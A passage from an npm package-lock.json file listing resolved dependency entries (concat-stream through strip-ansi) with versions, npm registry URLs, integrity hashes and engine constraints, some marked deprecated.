"https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": 
"https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": 
"sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": 
"^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": 
"sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", 
"resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { 
"version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": 
"sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": 
"sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", 
"integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", 
"resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { 
"version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", 
"dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": 